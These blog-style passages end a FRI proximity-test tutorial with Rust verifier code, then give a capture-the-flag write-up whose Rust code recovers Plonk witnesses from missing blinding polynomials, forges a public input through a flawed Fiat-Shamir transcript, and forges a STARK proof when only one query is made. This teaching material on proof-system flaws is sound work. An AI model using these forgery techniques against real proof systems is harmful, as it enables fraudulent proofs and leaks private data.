        .zip(&challenges.iotas)</span></span>
        .zip(evaluation_point_inverse)</span></span>
        .fold(true, |mut result, ((proof_s, iota_s), eval)| {</span></span>
            //This is done in constant time</span></span>
            result &= verify_query_and_sym_openings(</span></span>
                proof,</span></span>
                &challenges.zetas,</span></span>
                *iota_s,</span></span>
                proof_s,</span></span>
                domain,</span></span>
                eval,</span></span>
                two_inv,</span></span>
            );</span></span>
            result</span></span>
        })</span></span>
}</span></span></code></pre>
In this function, the verifier receives all the FriDecommitment (contained in the StarkProof), the domain $D_0$ (which includes all evaluation points), and the challenges (indexes) sampled by replaying what the prover did. Lines 12 to 19 are just optimizations for performance, where the verifier computes the inverses of the evaluation points in batch (this is to calculate divisions more efficiently). Then, the verifier proceeds to check each query. The function verify_query_and_sym_openings</code> has the following code:</p>
fn verify_query_and_sym_openings<F: IsField + IsFFTField>(</span></span>
    proof: &StarkProof<F>,</span></span>
    zetas: &[FieldElement<F>],</span></span>
    iota: usize,</span></span>
    fri_decommitment: &FriDecommitment<F>,</span></span>
    domain: &Domain<F>,</span></span>
    evaluation_point: FieldElement<F>,</span></span>
    two_inv: &FieldElement<F>,</span></span>
) -> bool</span></span>
where</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    let fri_layers_merkle_roots = &proof.fri_layers_merkle_roots;</span></span>
    let evaluation_point_vec: Vec<FieldElement<F>> =</span></span>
        core::iter::successors(Some(evaluation_point), |evaluation_point| {</span></span>
            Some(evaluation_point.square())</span></span>
        })</span></span>
        .take(fri_layers_merkle_roots.len())</span></span>
        .collect();</span></span>
</span>
    let mut v = fri_decommitment.layers_evaluations[0].clone();</span></span>
    // For each fri layer merkle proof check:</span></span>
    // That each merkle path verifies</span></span>
</span>
    // Sample beta with fiat shamir</span></span>
    // Compute v = [P_i(z_i) + P_i(-z_i)] / 2 + beta * [P_i(z_i) - P_i(-z_i)] / (2 * z_i)</span></span>
    // Where P_i is the folded polynomial of the i-th fiat shamir round</span></span>
    // z_i is obtained from the first z (that was derived through Fiat-Shamir) through a known calculation</span></span>
    // The calculation is, given the index, index % length_of_evaluation_domain</span></span>
</span>
    // Check that v = P_{i+1}(z_i)</span></span>
</span>
    // For each (merkle_root, merkle_auth_path) / fold</span></span>
    // With the auth path containing the element that the path proves its existence</span></span>
    fri_layers_merkle_roots</span></span>
        .iter()</span></span>
        .enumerate()</span></span>
        .zip(&fri_decommitment.layers_auth_paths)</span></span>
        .zip(&fri_decommitment.layers_evaluations)</span></span>
        .zip(&fri_decommitment.layers_auth_paths_sym)</span></span>
        .zip(&fri_decommitment.layers_evaluations_sym)</span></span>
        .zip(evaluation_point_vec)</span></span>
        .fold(</span></span>
            true,</span></span>
            |result,</span></span>
             (</span></span>
                (((((k, merkle_root), auth_path), evaluation), auth_path_sym), evaluation_sym),</span></span>
                evaluation_point_inv,</span></span>
            )| {</span></span>
                let domain_length = 1 << (domain.lde_root_order - k as u32);</span></span>
                let layer_evaluation_index_sym = (iota + domain_length / 2) % domain_length;</span></span>
                // Since we always derive the current layer from the previous layer</span></span>
                // We start with the second one, skipping the first, so the previous layer is the first one</span></span>
                // This is the current layer's evaluation domain length.</span></span>
                // We need to know what the decommitment index for the current</span></span>
                // layer is so we can check the Merkle paths at the right index.</span></span>
</span>
                // Verify opening Open(pₖ(Dₖ), −𝜐ₛ^(2ᵏ))</span></span>
                let auth_sym = &auth_path_sym.verify::<FriMerkleTreeBackend<F>>(</span></span>
                    merkle_root,</span></span>
                    layer_evaluation_index_sym,</span></span>
                    evaluation_sym,</span></span>
                );</span></span>
                // Verify opening Open(pₖ(Dₖ), 𝜐ₛ)</span></span>
                let auth_point =</span></span>
                    auth_path.verify::<FriMerkleTreeBackend<F>>(merkle_root, iota, evaluation);</span></span>
                let beta = &zetas[k];</span></span>
                // v is the calculated element for the co-linearity check</span></span>
                v = (&v + evaluation_sym) * two_inv</span></span>
                    + beta * (&v - evaluation_sym) * two_inv * evaluation_point_inv;</span></span>
</span>
                // Check that the next value is given by the prover</span></span>
                if k < fri_decommitment.layers_evaluations.len() - 1 {</span></span>
                    let next_layer_evaluation = &fri_decommitment.layers_evaluations[k + 1];</span></span>
                    result & (v == *next_layer_evaluation) & auth_point & auth_sym</span></span>
                } else {</span></span>
                    result & (v == proof.fri_last_value) & auth_point & auth_sym</span></span>
                }</span></span>
            },</span></span>
        )</span></span>
}</span></span></code></pre>
At each step, we have to divide by $x_0^{ 2^{ k } }$, which is the same as multiplying by the (multiplicative) inverse. We previously precomputed $x_0^{ - 1}$, and all the other inverses can be computed by repeatedly squaring that number (lines 14 to 19). Afterward, the verifier can go through all the FriLayers. We will use a fold iterator to have a constant time implementation (lines 35 to 43). If any check is false, then the proof will fail. The verifier samples the indexes for the current layer (line 51). Then, the verifier checks the inclusion proofs for the values (lines 59 and 65). Then, the verifier computes the value for the next layer from the current one (lines 69-70). If we are not in the last layer, the verifier checks whether this computed value is equal to the value given in the decommitment for the next layer (lines 73-75); if this does not pass, the test will fail. If it is the last layer, the verifier compares the computed value with the last value of the FRI protocol.</p>
Security</h2>
The security of FRI depends on the size of the finite field, the security of the hash function, and the number of queries. Let’s dive into each aspect:</p>
    1. The finite field size should be much larger than the degree of the polynomial (which in a STARK prover is related to the trace length). To achieve 128 bits of security, the field size should be at least $2^{128}$. If the maximum trace length is $2^{30}$, the field should be at least $2^{158}$. If the base field is not large enough, we can work with extensions when sampling random challenges. Some common choices are the StarkPrime 252, the prime $2^{64} - 2^{32} + 1$ (often miscalled MiniGoldilocks and using degree 3 extension fields), BabyBear or Mersenne 31 ($2^{31} - 1$, using degree 6 extension).</span></span>
    2. The security provided by the hash function should be at least the security level we aim at. For hash functions such as SHA2, SHA3, Blake2, Blake3, and Poseidon, the security is simply the size of the digest (hash) divided by two. Therefore, using digests of 32 bytes (256 bits) achieves the desired security level. If we want to cover ourselves against Grover's algorithm from quantum computers, we need to double the digest size to 64 bytes (512 bits). This increases the size of the proof.</span></span>
    3. The number of queries. Each query provides a certain amount of bits of security, depending on the blowup factor used. The number of queries can be reduced by introducing proof of work into the prover's protocol, incrementing the cost of generating false proofs. There is a tradeoff between the blowup factor used (which increases the prover's work and memory use) and the number of queries (which increases the proof size and verifier's work).</span></span></code></pre>
For more discussion into the security of FRI, see EthSTARK</a>, A summary on FRI low degree testing</a>, and Fiat-Shamir security of FRI</a>.</p>
Summary</h2>
FRI is a proximity test that allows us to show that a specific function is close to a low-degree polynomial, which is a helpful tool to build proof systems, such as STARKs or Plonky2.

In this post, we covered how to code the protocol from scratch (except for the necessary Merkle trees and finite field arithmetic) and how to verify a FRI proof. The protocol consists of randomly folding a polynomial and committing to the evaluations of the polynomial over a suitable domain using Merkle trees until the resulting polynomial has degree zero. To show that the protocol was carried out correctly, the prover must supply evaluations of each polynomial and prove that those values are inside the Merkle tree. The protocol’s security relies on the properties of the hash function and depends on the size of the field, the size of the digest, and the number of queries used.</p>


First Lambda-Ingo ZK CTF: ZK challenges using LambdaWorks
Unknown — Sun, 30 Jul 2023 00:00:00 +0000
Introduction</h1>
From July 14th to 16th, we organized, together with Ingonyama</a>, the first Lambda-Ingo ZK capture the flag</a> (CTF), where more than 60 teams and 160 people participated. The CTF involved several challenges related to zero-knowledge proofs (using Lambdaworks</a>) and fully-homomorphic encryption. We are thrilled with the whole experience, especially our second collaboration with Ingonyama and all the sponsors of the Lambda ZK week in Paris.</p>
The challenges were meant as example exercises to learn how to use Lambdaworks (especially the Starknet Stack</a> and Plonk</a> provers) and get an intuition of different vulnerabilities and bugs that can arise in those systems. If you want to know more about the development of the library or wish to contribute, join our telegram group</a>.</p>
This post will present the challenges we submitted for the CTF and explain how they can be solved.</p>
Plonk challenges</h1>
There were two challenges related to Plonk and possible vulnerabilities: frozen heart</a> and lack of blinding polynomials.</p>
Obi-Wan’s search</h2>
Challenge</h3>
In his quest to stop the Sith’s menace, Obi-Wan Kenobi finds a (Sith) holocron, giving a zero-knowledge proof of the existence of the Sith’s galactic foundry (using galactic Plonk).</p>
This place is rumored to contain several artifacts that could aid the Galactic Republic in its war efforts. The position, given by $(x , h , y)$, satisfies the equation $y = x \times h + b$.</p>
After some study, Obi-Wan finds the values of $y$ and $b$ (which belong to Sith lore). The only problem is that, even with this knowledge, it may take him quite long to find the mysterious planet, and the situation in the Republic is desperate.</p>
He also finds, together with the Holocron, a second item containing the SRS used to generate the proof, the prover, and a description of the circuit used.</p>
Will he be able to find the position of the foundry before it is too late?</p>
All the additional information is in this repo</a>.</p>
FLAG FORMAT: XXXX……..XXXX The flag consists of the x and h concatenated and written in hex (for example, x=0x123, h=0x789, the FLAG=123789)</p>
Solution</h3>
The challenge is finding the witness variables $x$ and $h$, given the values $y$ and $b$. Usually, we could not get access to these values, given the zero-knowledge property the Plonk system has. However, in this case, there is one fault in the prover: there are no blinding polynomials, and we can exploit this vulnerability to recover the unknowns.</p>
The first round of PLONK reads as follows:</p>
Compute polynomials a',b',c' as the interpolation polynomials of the columns of T at the domain H.</span></span>
Sample random b_1, b_2, b_3, b_4, b_5, b_6</span></span>
Let</span></span>
</span>
a := (b_1X + b_2)Z_H + a'</span></span>
</span>
b := (b_3X + b_4)Z_H + b'</span></span>
</span>
c := (b_5X + b_6)Z_H + c'</span></span>
</span>
Compute [a]_1, [b]_1, [c]_1 and add them to the transcript.</span></span></code></pre>
The multiples of $Z_H$ added to $ a’, b’, c’$ are called the blindings. In subsequent rounds, the polynomials $a, b, c$ are opened at the verifier’s chosen point.</p>
The polynomials $Z_H$ are the vanishing polynomials over the interpolation domain; they are equal to zero at each point in the set $H$. Therefore, adding that polynomial (or any combination) will not change the value of the $a^\prime$, $b^\prime$, and $c^\prime$ polynomials, which must satisfy the circuit equations. However, at any other point, they will add some randomness and help conceal the values.</p>
By checking the code of the challenge, the participants can find the following in circuit.rs.</code></p>
/// Witness generator for the circuit `ASSERT y == x * h + b`</span></span>
pub fn circuit_witness(</span></span>
    b: &FrElement,</span></span>
    y: &FrElement,</span></span>
    h: &FrElement,</span></span>
    x: &FrElement,</span></span>
) -> Witness<FrField> {</span></span>
    let z = x * h;</span></span>
    let w = &z + b;</span></span>
    let empty = b.clone();</span></span>
    Witness {</span></span>
        a: vec![</span></span>
            b.clone(),</span></span>
            y.clone(),</span></span>
            x.clone(),</span></span>
            b.clone(),</span></span>
            w.clone(),</span></span>
            empty.clone(),</span></span>
            empty.clone(),</span></span>
            empty.clone(),</span></span>
        ],</span></span>
        ...</span></span></code></pre>
This code reveals that the way prover constructs the $V$ matrix is</p>
A</th> B</th> C</th></tr></thead>

b</td> -</td> -</td></tr>
y</td> -</td> -</td></tr>
x</td> h</td> z</td></tr>
b</td> z</td> w</td></tr>
w</td> y</td> -</td></tr>
</tbody></table>

| - | -</li>
| - | -</li>
| - | -</li>
</ul>
Where -</code> are empty values. The PLONK implementation of lambdaworks-plonk</code> requires the empty values to be filled in with the first public input. So, in this case, the values -</code> will be replaced by $b$. This can be seen directly from the code of the challenge.</p>
Therefore, the polynomial $a’$, being the interpolation of the column A</code> is</p>
$$a’ = b L_1 + y L_2 + x L_3 + b L_4 + w L_5 + b L_6 + b L_7 + b L_8,$$</p>
where $L_i$ is the $i$-th polynomial of the Lagrange basis. Also, the value $w$ is equal to $y$. That can be seen from the code and the fact that the last row of the $V$ matrix corresponds to the assertion that the actual output of the circuit is equal to the claimed output $y$.</p>
During the proof, the verifier sends a challenge $\zeta$ and the prover opens, among other things, the polynomial $a$ at $\zeta$. Since the implementation of the challenge omits blindings, $a(\zeta) = a’ (\zeta)$, and we get</p>
$$a(\zeta) = b L_1(\zeta) + y L_2(\zeta) + x L_3(\zeta) + b L_4(\zeta) + y L_5(\zeta) + b L_6(\zeta) + b L_7(\zeta) + b L_8(\zeta).$$</p>
All the terms in this expression are known to the participants except for $x$, which can be cleared from the equation. To do so, the participants need to know how to recover the challenges to get $\zeta$ and how to compute the Lagrange polynomials evaluated at it.</p>
The second private input $h$ can be computed as $h = (y - b) / x$. The following piece of code recovers the challenge $\zeta$, computes the Lagrange polynomials at $\zeta$ and recovers $x$ and $h$:</p>
fn compute_private_input<F, CS>(</span></span>
    proof: &Proof<F, CS>,</span></span>
    vk: &VerificationKey<CS::Commitment>,</span></span>
    public_input: &[FieldElement<F>],</span></span>
    common_preprocessed_input: &CommonPreprocessedInput<F>,</span></span>
) -> (FieldElement<F>, FieldElement<F>)</span></span>
where</span></span>
    F: IsField,</span></span>
    CS: IsCommitmentScheme<F>,</span></span>
    CS::Commitment: Serializable,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    // Replay interactions to recover challenges. We are only interested in \zeta</span></span>
    let mut transcript = new_strong_fiat_shamir_transcript::<F, CS>(vk, public_input);</span></span>
    transcript.append(&proof.a_1.serialize());</span></span>
    transcript.append(&proof.b_1.serialize());</span></span>
    transcript.append(&proof.c_1.serialize());</span></span>
    let _beta = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
    let _gamma = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    transcript.append(&proof.z_1.serialize());</span></span>
    let _alpha = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    transcript.append(&proof.t_lo_1.serialize());</span></span>
    transcript.append(&proof.t_mid_1.serialize());</span></span>
    transcript.append(&proof.t_hi_1.serialize());</span></span>
    let zeta = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    // Compute `x` and `h`</span></span>
    let [b, y] = [&public_input[0], &public_input[1]];</span></span>
    let n = common_preprocessed_input.n as u64;</span></span>
    let omega = &common_preprocessed_input.omega;</span></span>
    let domain = &common_preprocessed_input.domain;</span></span>
    // Compute L_1(\zeta). This polynomial is equal to zero at</span></span>
    //each point in the domain, except for the first one</span></span>
    //where it is equal to unity</span></span>
    let l1_zeta =</span></span>
        (zeta.pow(n) - FieldElement::one()) / (&zeta - FieldElement::one()) / FieldElement::from(n);</span></span>
</span>
    let mut li_zeta = l1_zeta;</span></span>
    let mut lagrange_basis_zeta = Vec::new();</span></span>
    lagrange_basis_zeta.push(li_zeta.clone());</span></span>
    // Compute all other Lagrange polynomials using</span></span>
    // the relationship among them</span></span>
    for i in 1..domain.len() {</span></span>
        li_zeta = omega * &li_zeta * ((&zeta - &domain[i - 1]) / (&zeta - &domain[i]));</span></span>
        lagrange_basis_zeta.push(li_zeta.clone());</span></span>
    }</span></span>
    // Recover x by relating a at \zeta and the public inputs</span></span>
</span>
    let x = (&proof.a_zeta</span></span>
        - b * &lagrange_basis_zeta[3]</span></span>
        - y * &lagrange_basis_zeta[4]</span></span>
        - b * &lagrange_basis_zeta[0]</span></span>
        - y * &lagrange_basis_zeta[1]</span></span>
        - b * &lagrange_basis_zeta[5]</span></span>
        - b * &lagrange_basis_zeta[6]</span></span>
        - b * &lagrange_basis_zeta[7])</span></span>
        / &lagrange_basis_zeta[2];</span></span>
    // Recover h given that x is known    </span></span>
    let h = (y - b) / &x;</span></span>
    (x, h)</span></span>
}</span></span></code></pre>
The solution for the coordinates is:</p>
    1. `x: "2194826651b32ca1055614fc6e2f2de86eab941d2c55bd467268e9"`,</span></span>
    2. `h: "432904cca36659420aac29f8dc5e5bd0dd57283a58ab7a8ce4d1ca"`.</span></span></code></pre>
The flag is the concatenation of the two: FLAG: 2194826651b32ca1055614fc6e2f2de86eab941d2c55bd467268e9432904cca36659420aac29f8dc5e5bd0dd57283a58ab7a8ce4d1ca</code></p>
Loki’s trapdoor</h2>
Challenge</h3>
After successfully breaking into Loki’s vault and getting access to some of his finest treasures and weapons, you spot a small trapdoor under a carpet.</p>
The trapdoor is locked and contains a device with a PLONK prover. It says: Prove that the point $( 1 , y)$ belongs to the elliptic curve $y^2 = x^3 + 4$.</p>
You see that, in order to prove this, you need that $y^2 − x^3 − 4$ is equal to zero, which corresponds to the circuit for the prover provided by Loki.</p>
Can you open the trapdoor?</p>
nc 44.203.113.160 4000</p>
Additional information is in this repo</a>.</p>
FLAG FORMAT: ZKCTF{XXX…XXX}</p>
Solution</h3>
This challenge exploits the frozen heart vulnerability, which arises when the Fiat-Shamir transformation is not implemented correctly. The main problem is that $(1,y)$ is not a point belonging to the BLS12-381 elliptic curve. If so, $y^2 = 1^3 + 4 = 5$ but $5$ is not a quadratic residue modulo the BLS12-381 prime. Therefore, the way to solve the challenge must be by creating a false proof.</p>
The circuit is:</p>
PUBLIC INPUT: x</span></span>
PUBLIC INPUT: y</span></span>
</span>
ASSERT 0 == y^2 - x^3 - 4</span></span></code></pre>
And it instantiated over the BLS12 381</code> scalar field.</p>
The vulnerability stems from a bug in the implementation of strong Fiat-Shamir. A correct implementation should add, among other things, all the public inputs to the transcript at initialization. If a public input is not added to the transcript and is in control of the attacker, they can forge a fake proof. Fixing x=1</code> leaves y</code> under the user’s control. We can see that the Fiat-Shamir transcript does not incorporate the public input, as shown here</a></p>
pub fn new_strong_fiat_shamir_transcript<F, CS>(</span></span>
    vk: &VerificationKey<CS::Commitment>,</span></span>
    _public_input: &[FieldElement<F>],</span></span>
) -> DefaultTranscript</span></span></code></pre>
The attack is described in Section V of Weak Fiat-Shamir Attacks on Modern Proof Systems</a>.</p>
Here is a summary of the attack:</p>
</p>
Instead of taking random polynomials (steps (1) to (7)), the current solution takes a valid proof for the pair x=0</code>, y=2</code> and uses it to forge a y</code> for x=1</code> that’s compatible with the original proof.</p>
#[allow(unused)]</span></span>
fn forge_y_for_valid_proof<F: IsField, CS: IsCommitmentScheme<F>>(</span></span>
    proof: &Proof<F, CS>,</span></span>
    vk: &VerificationKey<CS::Commitment>,</span></span>
    common_preprocessed_input: CommonPreprocessedInput<F>,</span></span>
) -> FieldElement<F></span></span>
where</span></span>
    CS::Commitment: Serializable,</span></span>
    FieldElement<F>: ByteConversion,</span></span>
{</span></span>
    // Replay interactions like the verifier</span></span>
    let mut transcript = new_strong_fiat_shamir_transcript::<F, CS>(vk, &[]);</span></span>
</span>
    transcript.append(&proof.a_1.serialize());</span></span>
    transcript.append(&proof.b_1.serialize());</span></span>
    transcript.append(&proof.c_1.serialize());</span></span>
    let beta = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
    let gamma = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    transcript.append(&proof.z_1.serialize());</span></span>
    let alpha = FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    transcript.append(&proof.t_lo_1.serialize());</span></span>
    transcript.append(&proof.t_mid_1.serialize());</span></span>
    transcript.append(&proof.t_hi_1.serialize());</span></span>
    let zeta = &FieldElement::from_bytes_be(&transcript.challenge()).unwrap();</span></span>
</span>
    // Forge public input</span></span>
    let zh_zeta = zeta.pow(common_preprocessed_input.n) - FieldElement::one();</span></span>
</span>
    let omega = &common_preprocessed_input.omega;</span></span>
    let n = common_preprocessed_input.n as u64;</span></span>
    let one = &FieldElement::one();</span></span>
</span>
    let l1_zeta = ((zeta.pow(n) - one) / (zeta - one)) / FieldElement::from(n);</span></span>
</span>
    let l2_zeta = omega * &l1_zeta * (zeta - one) / (zeta - omega);</span></span>
</span>
    let mut p_constant_zeta = &alpha</span></span>
        * &proof.z_zeta_omega</span></span>
        * (&proof.c_zeta + &gamma)</span></span>
        * (&proof.a_zeta + &beta * &proof.s1_zeta + &gamma)</span></span>
        * (&proof.b_zeta + &beta * &proof.s2_zeta + &gamma);</span></span>
    p_constant_zeta = p_constant_zeta - &l1_zeta * &alpha * &alpha;</span></span>
</span>
    let p_zeta = p_constant_zeta + &proof.p_non_constant_zeta;</span></span>
    -(p_zeta + l1_zeta * one - (&zh_zeta * &proof.t_zeta)) / l2_zeta</span></span>
}</span></span></code></pre>STARKs challenge</h1>
Challenge</h2>
Good morning hacker.</p>
If you are reading this, the date should be July 7th, 2023, and you should be checking the Lambda-Ingoyama CTF challenges site.</p>
Hopefully, we managed to hijack the site, and you are reading this now. We are not allowed to say much, but you must know it’s of utmost importance that you win this challenge.</p>
So, we have decided to help. Don’t worry; it should be easy. We have found the right exploit to solve and are forwarding the solution to you.</p>
If something goes wrong, we leave some additional data we have collected. We don’t know if it’s helpful, but we hope it can help.</p>
It’s now up to you to take the flag. We wish you good luck.</p>
https://github.com/ingonyama-zk/ZKCTF-ch3-client</a></p>
FLAG FORMAT: ZKCTF{XXX…XXX}</p>
Solution</h2>
The key point here is that the STARK prover does only one query, which makes the soundness error significant. This vulnerability was present in an early implementation of Lambdaworks (see this PR</a>) and was discovered by Michael Carilli</a> (to whom we are really grateful).</p>
The first step is to send the data to an endpoint of the server, which should reply with something like “Expired proof.” After that, the next step is to inspect the proof. Most of the data will not be relevant. Counting the number of queries, we realize there is only 1. Now it remains to see how to exploit it.</p>
Some additional data needs to be used, such as the offset, the constraints, and the blowup factor. Offsets and constraints are hinted at in the data. The blowup factor can be guessed or hinted at.</p>
We can now move to break the STARK protocol, taking advantage of the FRI soundness error, which is quite large for one query. We must first pass the consistency check at the out-of-domain point $z$ between the composition polynomial and the trace polynomials. The verifier performs this check in step 2</a>. We can pass this test automatically if we calculate the value of the polynomial directly from the trace polynomials:</p>
pub fn composition_poly_ood_evaluation_exact_from_trace<F: IsFFTField, A: AIR<Field = F>>(</span></span>
    air: &A,</span></span>
    trace_ood_frame_evaluations: &Frame<F>,</span></span>
    domain: &Domain<F>,</span></span>
    z: &FieldElement<F>,</span></span>
    rap_challenges: &A::RAPChallenges,</span></span>
    boundary_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
    transition_coeffs: &[(FieldElement<F>, FieldElement<F>)],</span></span>
) -> FieldElement<F> {</span></span>
    let _public_input = air.pub_inputs();</span></span>
    let boundary_constraints = air.boundary_constraints(rap_challenges);</span></span>
</span>
    let n_trace_cols = air.context().trace_columns;</span></span>
</span>
    let boundary_constraint_domains =</span></span>
        boundary_constraints.generate_roots_of_unity(&domain.trace_primitive_root, &[n_trace_cols]);</span></span>
</span>
    let values = boundary_constraints.values(&[n_trace_cols]);</span></span>
</span>
    // Following naming conventions from https://www.notamonadtutorial.com/diving-deep-fri/</span></span>
    let mut boundary_c_i_evaluations = Vec::with_capacity(n_trace_cols);</span></span>
    let mut boundary_quotient_degrees = Vec::with_capacity(n_trace_cols);</span></span>
</span>
    for trace_idx in 0..n_trace_cols {</span></span>
        let trace_evaluation = &trace_ood_frame_evaluations.get_row(0)[trace_idx];</span></span>
        let boundary_constraints_domain = &boundary_constraint_domains[trace_idx];</span></span>
        let boundary_interpolating_polynomial =</span></span>
            &Polynomial::interpolate(boundary_constraints_domain, &values[trace_idx])</span></span>
                .expect("xs and ys have equal length and xs are unique");</span></span>
</span>
        let boundary_zerofier =</span></span>
            boundary_constraints.compute_zerofier(&domain.trace_primitive_root, trace_idx);</span></span>
</span>
        let boundary_quotient_ood_evaluation = (trace_evaluation</span></span>
            - boundary_interpolating_polynomial.evaluate(z))</span></span>
            / boundary_zerofier.evaluate(z);</span></span>
</span>
        let boundary_quotient_degree = air.trace_length() - boundary_zerofier.degree() - 1;</span></span>
</span>
        boundary_c_i_evaluations.push(boundary_quotient_ood_evaluation);</span></span>
        boundary_quotient_degrees.push(boundary_quotient_degree);</span></span>
    }</span></span>
</span>
    let trace_length = air.trace_length();</span></span>
</span>
    let boundary_term_degree_adjustment = air.composition_poly_degree_bound() - trace_length;</span></span>
</span>
    let boundary_quotient_ood_evaluations: Vec<FieldElement<F>> = boundary_c_i_evaluations</span></span>
        .iter()</span></span>
        .zip(boundary_coeffs)</span></span>
        .map(|(poly_eval, (alpha, beta))| {</span></span>
            poly_eval * (alpha * &z.pow(boundary_term_degree_adjustment) + beta)</span></span>
        })</span></span>
        .collect();</span></span>
</span>
    let boundary_quotient_ood_evaluation = boundary_quotient_ood_evaluations</span></span>
        .iter()</span></span>
        .fold(FieldElement::<F>::zero(), |acc, x| acc + x);</span></span>
</span>
    let transition_ood_frame_evaluations =</span></span>
        air.compute_transition(trace_ood_frame_evaluations, rap_challenges);</span></span>
</span>
    let transition_exemptions = air.transition_exemptions();</span></span>
</span>
    let x_n = Polynomial::new_monomial(FieldElement::<F>::one(), trace_length);</span></span>
    let x_n_1 = x_n - FieldElement::<F>::one();</span></span>
</span>
    let divisors = transition_exemptions</span></span>
        .into_iter()</span></span>
        .map(|exemption| x_n_1.clone() / exemption)</span></span>
        .collect::<Vec<Polynomial<FieldElement<F>>>>();</span></span>
</span>
    let mut denominators = Vec::with_capacity(divisors.len());</span></span>
    for divisor in divisors.iter() {</span></span>
        denominators.push(divisor.evaluate(z));</span></span>
    }</span></span>
    FieldElement::inplace_batch_inverse(&mut denominators);</span></span>
</span>
    let mut degree_adjustments = Vec::with_capacity(divisors.len());</span></span>
    for transition_degree in air.context().transition_degrees().iter() {</span></span>
        let degree_adjustment =</span></span>
            air.composition_poly_degree_bound() - (air.trace_length() * (transition_degree - 1));</span></span>
        degree_adjustments.push(z.pow(degree_adjustment));</span></span>
    }</span></span>
    let transition_c_i_evaluations_sum =</span></span>
        ConstraintEvaluator::<F, A>::compute_constraint_composition_poly_evaluations_sum(</span></span>
            &transition_ood_frame_evaluations,</span></span>
            &denominators,</span></span>
            &degree_adjustments,</span></span>
            transition_coeffs,</span></span>
        );</span></span>
</span>
    &boundary_quotient_ood_evaluation + transition_c_i_evaluations_sum</span></span>
}</span></span></code></pre>
The prover splits the composition polynomial between even and odd terms, $H_1 (z^2 )$ and $H_2 (z^2 )$. The verifier has to compute $H(z)$ from the trace polynomials and then check that

$H(z) = H_1 (z^2 ) + z H_2 (z^2 )$

We can enforce this check by making sure that the verifier gets $H_1 (z^2 ) = H(z)$ and $H_2 (z^2 ) = 0$. Of course, this will generate some issues at other parts of the verifier, such as the DEEP composition polynomial. The DEEP composition polynomial allows us to check that all polynomials have been appropriately evaluated at $z$,

$P_0 (x) = \sum_j \gamma_j \frac{t_j (x) - t_j (z)}{x - z} + \sum_j \gamma^\prime_j \frac{t_j (x) - t_j (g z)}{x - gz} + \gamma \frac{H_1 (x) - H_1 (z^2 )}{x - z^2} + \gamma^\prime \frac{H_2 (x) - H_2 (z^2 )}{x - z^2}$</p>
Of course, if we send false evaluations of the polynomials $H_1(x^2 )$ and $H_2 (x^2 )$, the last terms will not be low-degree polynomials and should not satisfy FRI testing. However, we can evaluate exactly the values of $(H_k (\omega_j) - H_k(z^2 ))/( \omega_j - z^2 )$ and create a polynomial which passes through as many evaluations as the low-degree test allows us (which is the trace length) by interpolation. The following function computes the DEEP composition polynomial</p>
fn compute_deep_composition_poly_evil<A: AIR, F: IsFFTField>(</span></span>
    air: &A,</span></span>
    domain: &Domain<F>,</span></span>
    trace_polys: &[Polynomial<FieldElement<F>>],</span></span>
    round_2_result: &Round2<F>,</span></span>
    round_3_result: &Round3<F>,</span></span>
    z: &FieldElement<F>,</span></span>
    primitive_root: &FieldElement<F>,</span></span>
    composition_poly_gammas: &[FieldElement<F>; 2],</span></span>
    trace_terms_gammas: &[FieldElement<F>],</span></span>
) -> Polynomial<FieldElement<F>></span></span>
where</span></span>
    lambdaworks_math::field::element::FieldElement<F>: lambdaworks_math::traits::ByteConversion,</span></span>
{</span></span>
    // Compute composition polynomial terms of the deep composition polynomial.</span></span>
    let h_1 = &round_2_result.composition_poly_even;</span></span>
    let h_1_z2 = &round_3_result.composition_poly_even_ood_evaluation;</span></span>
    let h_2 = &round_2_result.composition_poly_odd;</span></span>
    let h_2_z2 = &round_3_result.composition_poly_odd_ood_evaluation;</span></span>
    let gamma = &composition_poly_gammas[0];</span></span>
    let gamma_p = &composition_poly_gammas[1];</span></span>
    let z_squared = z.square();</span></span>
</span>
    // 𝛾 ( H₁ − H₁(z²) ) / ( X − z² )</span></span>
    let h_1_term = {</span></span>
        let x = Polynomial::new_monomial(FieldElement::one(), 1);</span></span>
        let h_1_num = gamma * (h_1 - h_1_z2);</span></span>
        let h_1_denom = &x - &z_squared;</span></span>
        interp_from_num_denom(&h_1_num, &h_1_denom, domain)</span></span>
    };</span></span>
</span>
    // 𝛾' ( H₂ − H₂(z²) ) / ( X − z² )</span></span>
    let h_2_term = {</span></span>
        let x = Polynomial::new_monomial(FieldElement::one(), 1);</span></span>
        let h_2_num = gamma_p * (h_2 - h_2_z2);</span></span>
        let h_2_denom = &x - &z_squared;</span></span>
        interp_from_num_denom(&h_2_num, &h_2_denom, domain)</span></span>
    };</span></span>
</span>
    // Get trace evaluations needed for the trace terms of the deep composition polynomial</span></span>
    let transition_offsets = &air.context().transition_offsets;</span></span>
    let trace_frame_evaluations = &round_3_result.trace_ood_evaluations;</span></span>
</span>
    // Compute the sum of all the deep composition polynomial trace terms.</span></span>
    // There is one term for every trace polynomial and every row in the frame.</span></span>
    // ∑ ⱼₖ [ 𝛾ₖ ( tⱼ − tⱼ(z) ) / ( X − zgᵏ )]</span></span>
</span>
    let mut trace_terms = Polynomial::zero();</span></span>
    for (i, t_j) in trace_polys.iter().enumerate() {</span></span>
        let i_times_trace_frame_evaluation = i * trace_frame_evaluations.len();</span></span>
        let iter_trace_gammas = trace_terms_gammas</span></span>
            .iter()</span></span>
            .skip(i_times_trace_frame_evaluation);</span></span>
        for ((evaluations, offset), elemen_trace_gamma) in trace_frame_evaluations</span></span>
            .iter()</span></span>
            .zip(transition_offsets)</span></span>
            .zip(iter_trace_gammas)</span></span>
        {</span></span>
            </span></span>
            let t_j_z = evaluations[i].clone();</span></span>
            </span></span>
            let z_shifted = z * primitive_root.pow(*offset);</span></span>
            </span></span>
            let mut poly = t_j - t_j_z;</span></span>
            poly.ruffini_division_inplace(&z_shifted);</span></span>
            trace_terms = trace_terms + poly * elemen_trace_gamma;</span></span>
        }</span></span>
    }</span></span>
</span>
    h_1_term + h_2_term + trace_terms</span></span>
